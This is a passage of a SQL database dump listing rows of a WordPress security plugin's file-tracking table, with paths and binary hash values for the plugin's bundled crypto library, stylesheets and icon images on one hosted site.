('*ÇÈÆ²¦¼bÅŸ*ee¸', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ðx\\8zíMØ~—.‹', 'üvR¬\0‹S~[ü\r‚ªÒ®6ßáoÝú¾á’þ:Åšµ\r]', '', 0, '?'),
('H·¨Y6oïãD{ˆLHê˜', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'V~D¶©ç;ç[`éíd', 'ß¿\n"øªKL×Ã\Z¼6''¨ƒ€5ãÊcö ªz™dÀýw', '', 0, '?'),
('óóÒÍÑâžžùª^Õ˜RÛ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÉÞo”…å—¹å§h€g[', '€àÀß.Ö-h4`9S _\rè“)IÍ(†íWÓò', '', 0, '?'),
('£p«Ó@™ÆÎwN„ºj®', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ristretto255.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ristretto255.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«Uëª sŸ	…ÎÜ•', 'i›‰ŸlwË\n^Î÷ÇE|‡"ú ¤ÝSþæ²„Biâ', '', 0, '?'),
('%$ÎïÝM¼qæT<Äýð', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'C£¼UOžõ\Zß ¡xtH', 'ŒG\n"‡_/Açg“h	U?âS‚sóHö×‘‘Y¤ô½Ù³', '', 0, '?'),
('0ƒ¹ÖóaÍOµZI|Ié', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ðW—HY ñ®Â²·‰', 'zI]Š_ŒÇ²”¦!ì®bÑˆ×6üdìuYÙ3', '', 0, '?'),
('Ì™~üÈŒÃ®+äíbyÈ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ùÇ„÷úç°•ÃÛ¹ß3w', 'Ê£>yqÓ©äf_#›»¼Š†QŽžuÈW‰"•^?¥Û', '', 0, '?'),
('K0µöò\rÅé–Ücnçû', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þRop(î9¼¥0¢D‰z÷', '$ò$“OáVè»f.i£{¨÷å\\ƒþOþ…8„ˆp3½Í', '', 0, '?'),
('?Užµö½¼š''_l.…p', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'o>B÷˜	¿Ÿ½‘IN”-y', 'þåhlŽ[À»¶½†§ñ«(¿l~‘Q÷ußFM²	“', '', 0, '?'),
('÷¶gxƒA‰È¢}¡g¢', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™é½]áŠ®éÂìÈ£&', '‘™K”ò#ò@JU°}F—„ŽÁÁ,üþå![', '', 0, '?'),
('Á]¯*Á.>`Eõ“f±', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kÓF£ Æh¢ç€1-¦', '6!oŠmö¦ÝŽ^Ž.Á^@Ë¨ÑÒv7ñ	Iáœ}€Ÿ', '', 0, '?'),
('Îl/<ÀÍUçëZA‹å', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­¯''èÐˆµHn0´ì\rv', 'Î<iâqáê‡Ã³tIxÅ8ª+•I‘µÙ‡W;¥''', '', 0, '?'),
('-\\¬‹[×µ¹†èJ’×¥', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ù¡˜\\rþÀéV;$IstÇ', '1<¥ÆÃ7ôAp4ÿáÁ—™•0VƒP¡bƒ¾#;T', '', 0, '?'),
('´of?Þ3¨P¿1ò"â', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'g"Ì¤/O”›ìY¢·''', 'Ê8æeêT›et\r jœP÷/¥ÀJä†™<^¾rÓ¥z', '', 0, '?'),
('›ó71Ð¬È}\nûÈ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1’2+;FÄîÅÐ½NMƒ’', '¾w†Å"³*”Á5¢U T@™åœnyÈ³Æ^a¥u½°''', '', 0, '?'),
('ÇåwªÛy¾*®XÍO\nG›¥', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿´}&?P¶!D¼,­ý"ß', '}gáY/~†¾[-žÔš¼ôd	±Èpël9fÎ¬ósß', '', 0, '?'),
('W8h°!É©k®Ä‰''“', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'r RU¬bâ*ÍÒ\0''µ', 'xíîÑò<Ùs£’BZš2œj§RM''0%$¹Üi{ V', '', 0, '?'),
('ãÍ¥`FJÍöS±u', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Kz+UíÁäÅ¸(ê5\\', '8:½‘o™Iô9,ê¿=zDk8;Ñ{A{†\Zij', '', 0, '?'),
('ÄIa»\nØŽš–êÐa', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í¢¾>\Zëð°\Z+•,', '*y$˜MQ[qÓ:héš"îÀù)£XTC\0ë\\k', '', 0, '?'),
('òcY„F¶êžß}åj`½¶', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3‚ñ‘ýë’b(æµÐš', 'n;ˆ<Ù±	Ç•°-WÕt“ù]ÎÁ<‘s°êÖu¡', '', 0, '?'),
('ïu_ô‹‹ÿÂÊ~!\0Ä', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Y=\nYà´99š2­ø', 'ý—û6©‘°\Z/ˆˆùpây5îÁœÒEð”Ø­½©­O±E', '', 0, '?'),
('oæàñ	lÑÑ´Æcd', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'æ×ø\n°À¤@Lj‡wDê', '\r¯8úd³ Ÿ‡²ð×8sÚ‡ªÎî6 èFúÈŒÏ', '', 0, '?'),
('©ïú~+ØqêX¾Û"`', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'zZBWž¯m‘BÙË¯Âá', '¸È„!®++à¶òÊ8…½,vF¡Ýúâ÷+–¹öž3	', '', 0, '?'),
('æÓÄh]‡‚Cù€²A*', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"ÈÎ´¿ñL²Óï.³Áo', 'eÁÈoÙŽÔ3ÃûÚuÏ¨°¢šyçËåÔâ3ˆ8\nØ‘:', '', 0, '?'),
('Å_Ìn€ü£³Ép·¼aV', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>*LÖ1ÊËµ©"k%Fƒ+', 'Z±öiéMÛf¼UŒv±i-å})ôùfÑ"†þMnd?X', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('Ž¢éXp¤ÜÓçŠ~0D', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÐW¯oe±~°oB2ž_;', '5ŸqõªSrLß]OX½¥˜‹sqˆÍìð+l<‘ÈÉ’', '', 0, '?'),
('µA?à™]\\8«PMTÉl', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '0Ç°{8…}”—z²l©Ôü', 'jGðÄÅ~.''¤GÌÎï*ù—''³S3t~™¼æÓ†³´', '', 0, '?'),
('BæºP‰X¡WÌã6éË', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'øúmô9N£2µÛÅ³[Š˜', 'Ø=Ñà*…tüzv''ÞçWµºð\nñKRùlë°èx7', '', 0, '?'),
('¦[''é/£Óþ¢; †”', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ü†)Cô/Á†Õ¯Ë Ù', '1ÆÂË''CÅAUuŠ3…i£öf·f“¦‰‡ìDtl~Ñ', '', 0, '?'),
('a”@—WrQw¶ÌZ\n.î', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­Ü‘zŒg<Nèô\n?o6f', 'ŽÁ“R °ôEgøX3•†JAc”ì!aú_ÊôS{', '', 0, '?'),
('Ì ˆûþÈK i–D“Át', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ØÊæÍÁZzš#Hèç²', 'n]¨ëx“Ë¶º«¤\Z_ÑªkÔB³-a½&½Ìƒ', '', 0, '?'),
('WÍLjN/¼@Ï¢ßÆ°‚', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'T	˜Änrkœï•', 'å³;\\øÂXÚîê/0;¾œQòP†.“B4Ãò\ZÔ', '', 0, '?'),
('_Ì#è‹ñU1púGSò³', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Z°ŠÅrt½ÂýwúÉ(˜e', '¨Ò¿DÜI<õ^Èi2dW‚]Gâ_ä-+…A8óW', '', 0, '?'),
('­?FÏ¸½ë¼¥A†€R1Ê', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™p‹˜Ô¦d0ÄàlN&7+', '^s\nù@G,¤Ú–\n;|3P	nÔ”/\rzAÝ"\nd', '', 0, '?'),
('‚/	ÁE:KòRå¯¥Àv', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—VÉÃ[×SPkCû', 'úûÚºÙ…±Å´‹¼}C:åÃ¸=€~è†ÞQÀ(8–Ð$Q', '', 0, '?'),
('–z9»	Å`üd3Ý\0ÈIay', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Š¯mg‘ßQ~[#£\\Åb¸', 'P‚óýM²·‘T1œ½Õ;ˆª·ŸºBæ¸`¨½¹', '', 0, '?'),
('Bã@R*G™xF4N}', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£ž''–_®?SÅŸ\Z]ÍyŒ', '¤6‹Ð[-óŠ…,9YR¡rÚ\rY"-ø€anó²‘6$Š', '', 0, '?'),
('‰®¿¼œ‘GˆGý “ìa"', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¼ü*M]YnM$^Ã¹"·', '…ÀáÏÌN×Ëo…KtQ«V ««\r3¨-ØóyÙ-', '', 0, '?'),
('a¿J”’rÓäÝ&Æ-DÝ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'U¦ªoç}S}Á–8.', 'î$®Ös¶ÓôˆƒìÈ?;f¢Ä =`\rÙ	ÞÄ&¹«!', '', 0, '?'),
('¨XXïŽ“*Îá!2Ö~Å', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'úž.íù›Ó»µ1ÓA,t/', '½ö~›"t\\Â›,û…4ô½w¥Â¡¯-‘~¯‡Mq£äó˜', '', 0, '?'),
('qÅ$''6‹eâú¶÷-W]', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ø«Áãšéûÿµ¾øv¦÷²', 'Ïh½€³G8J4"G`¦‡ïŸÇ–Œ¶ÛMD‚¯z', '', 0, '?'),
('£TL êßˆ,]½¬Õ¦†m', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '8‘	¤¢½»:{€äWóêe', '6{w÷»µ^Gk®Î«Ã25Ýúb“ó„\räÝñ“«„æˆ', '', 0, '?'),
('°ÑØ#ÐÊ/àæè0è', 'wp-content/plugins/wordfence/css/activity-report-widget.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/activity-report-widget.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'J„^x;y‚­‚°Ôc¡ýÿ', 'ÐÓ¡®ÁfÅaMšWv+ò€¨WŸ%}Öêž`DöN£Å', '', 0, '?'),
('wýÉíÕ$\0v‘yÔ6€', 'wp-content/plugins/wordfence/css/diff.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/diff.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ü€g	­ú	™$’˜‹`róQ', 'ÀÜ$µÌhEJ^54<$žÓ­YcÃ×áÂ’Þ&', '', 0, '?'),
('˜4ø(IMxS¨Ã” ö-E…', 'wp-content/plugins/wordfence/css/fullLog.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/fullLog.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eÉ.i‹`«ƒÎ¾Uç¹v', '?õ>ü°?hôÎ¾[µÂ²ïPØu{Ûpuúa þ‰‹a', '', 0, '?'),
('•h¯r\Z¨—ªº;%e˜-x', 'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ØGÓJû‡u;QÔZ6ø½', 'ÿû…ß\\MUŒíKhQ¯wÀC©¶iÖV´î¢¹²ÎJ''', '', 0, '?'),
('2´v–­''³Í9\rÃèz', 'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'p¢ÔbDî@pýG+×±', '*DZÍ>ùBgñ&Y‰Yˆ›þ„Žâ¨4(<¨/', '', 0, '?'),
('\ZŸ ÜR³÷¹[Ö''Ý>', 'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ëJ—\\c7’yþxÆÐ³l', '³~ÀÍqVšÂ¯¾*''Å1”¥¤š]3^‘öžÍÉm', '', 0, '?'),
('2r}ÜVáÄ¥$^¥‹‰n/', 'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'h…^n=(Š±&¡ñÝ‚¶N&', 'S²óDIBÿzÑ_-?(YÎãpE¥yûÆ¹A¡', '', 0, '?'),
('\\‘®íàÆ¤7öî²Q€o', 'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '|¦%;w©ý¯Q»8øÈ@', 'wi>Þ6·Æ¬à4Èå .NÊC¹äž\Zÿ4ªIOžÙ', '', 0, '?'),
('”vO¯Ö#èJ¥NïÔ+ì', 'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Aa+JD$ø2Ÿ‚J”Ú', '¬/#?Tï†iOLyv¦íuš˜TK”°©É¤½·\\Ø»õ', '', 0, '?'),
('^ï`Ümƒ\0¯ZœŽôq', 'wp-content/plugins/wordfence/css/iptraf.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/iptraf.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ðeºbf.„Â\nÝV[ÝxPh', 'JŠ‹-@ ]á-Ðò‡	ÔcqÛúåWQ$8«', '', 0, '?'),
('íÇgn†©ÿÉ4ÈfëŠ>', 'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')eíôfÕ#¡`Pž~7Än', '-míÆzíÜnàNÊFûE\0Ñ­\\vqësL?—Z\Z²½', '', 0, '?'),
('V‘0ÔpH=á^Q~Å›$\r', 'wp-content/plugins/wordfence/css/jquery-ui.min.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/jquery-ui.min.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'À}Oñ“^×0tGGäÌQ', '³Ù$rb=pÏh¹xËK£ù5]8ÇQþ§˜R‰¯jn4', '', 0, '?'),
('ÉQÿñPó;ÖûÊcr¯‰f', 'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/jquery-ui.structure.min.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#õ/Ì±h<ÀžUÕõ¤', 'ŸnäèøÁàiÙë—…µNµvX¥7«Y]´…¼°D', '', 0, '?'),
('p.pe÷`à„X$åÙŒy', 'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/jquery-ui.theme.min.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b’K¿0ŽböºxÑ™]', '4ÃõýùÇ\n–cµE2=V“{Æ+è\\goÐ…O‡¤', '', 0, '?'),
('ÿÎ„ØŠ¸±d~-PÛÔk', 'wp-content/plugins/wordfence/css/license/care-global.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/care-global.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œkK·.ÒÇ´¬U¦Í^', '2òÆ²˜v{"SÛó=««^!Úþ«W:C,OJ•e:É9', '', 0, '?'),
('+epž4j!/gúÒe¥', 'wp-content/plugins/wordfence/css/license/care.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/care.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ûq)*ÿ§„*v±v#h', 'Fðr:ÔrÕ(nñ‡~3ò›wd”9ÔRð´O¬', '', 0, '?'),
('¸mAþÚªûwRxG“ø–!', 'wp-content/plugins/wordfence/css/license/free-global.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/free-global.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'iÜjõgE”B7Áq,Ç', 'ø¬\\R1¢"¨`l 2íLïL×c”Xe‹ŸEt	BMŽ|', '', 0, '?'),
('.È†œ+·­>•\Z D\rR', 'wp-content/plugins/wordfence/css/license/free.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/free.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'cÎMÆoœ²×s|„…ùvø', 'z¦÷5Þñ£«ÙÅÒ¤Zžu¾|*vs,\0§BA¬þß9', '', 0, '?'),
('ª„d¨–,ÛoHÃª86³Sû', 'wp-content/plugins/wordfence/css/license/premium-global.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/premium-global.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ù¬5ÍÀ&‰ë–]U¼Ê\0', '=:IêÃ#_A¤\\R‹õÏÖ£XÔæF¢§SO™ˆreóc', '', 0, '?'),
('û8GrÍ.Ï5Ÿ\0¾^1', 'wp-content/plugins/wordfence/css/license/premium.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/css/license/premium.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Z¹¦+DqK™ÒU', 'Ò—±d´ÍUûAÐE¼®³qmï:, *õÉ•', '', 0, '?'),
